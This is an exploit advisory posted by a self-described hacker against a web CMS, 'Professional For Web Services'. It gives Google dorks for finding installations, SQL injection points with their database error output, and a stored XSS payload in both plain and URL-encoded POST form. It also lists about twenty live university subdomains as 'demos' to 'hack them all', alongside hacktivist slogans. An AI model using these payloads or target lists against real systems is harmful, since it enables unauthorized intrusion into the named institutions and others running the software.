# Exploit Title: [iraq Professional For Web Services Multiple Vulnerabilities]
# Google Dorks: [ intext:Powered by Professional For Web Services - بدعم من بروفشنال لخدمات المواقع ]
# [ inurl:/graphics_view.php?details=]
# Date: [1-8-2015]
# Exploit Author: [R3NW4]
# Platform: (WebApps)
# Vendor Homepage [http://www.iraqiprof.com/]
# Version: [All versions]
# Tested on: [Linux(Debian)]
# Greetz: MuhmadEmad - Razor X Blade - All Kurdish Hackers
# the proffesionals has been exploited :D
-----------------------
SQL injection: ( don't work in the higher Versions :( )
site.com/graphics_view.php?details=4
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '= 1 and active = 1' at line 1
-----------------------
SQLi From POST:
goto:
site.com/search.php
and in search field just type: '
and we get:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1
hack it with live http header :)
-----------------------
Stored XSS
go to /search.php and in search field type:
"'/>><img src=x onerror=alert(/XSS_HERE/)>
or send POST request to /search.php with this data:
search=%22%27%2F%3E%3E%3Cimg+src%3Dx+onerror%3Dalert%28%2FXSS_Here%2F%29%3E&select=news&button=%D8%A7%D8%A8%D8%AD%D8%AB
------------------------
Demos:
Hack them all :)
http://cmed.tu.edu.iq/
http://cden.tu.edu.iq/
http://cpha.tu.edu.iq/
http://cnur.tu.edu.iq/
http://ceng.tu.edu.iq/
http://cpme.tu.edu.iq/
http://cape.tu.edu.iq/
http://cagr.tu.edu.iq/
http://csci.tu.edu.iq/
http://ccms.tu.edu.iq/
http://ciss.tu.edu.iq/
http://claw.tu.edu.iq/
http://cpos.tu.edu.iq/
http://cade.tu.edu.iq/
http://ceps.tu.edu.iq/
http://cedh.tu.edu.iq/
http://cphe.tu.edu.iq/
http://cedw.tu.edu.iq/
http://cbes.tu.edu.iq/
http://cedt.tu.edu.iq/
http://carts.tu.edu.iq/
more in google :D
-------------------------
# this is kurdish hackerz revolution,Freedom For Kurdistan
# https://twitter.com/R3NW4
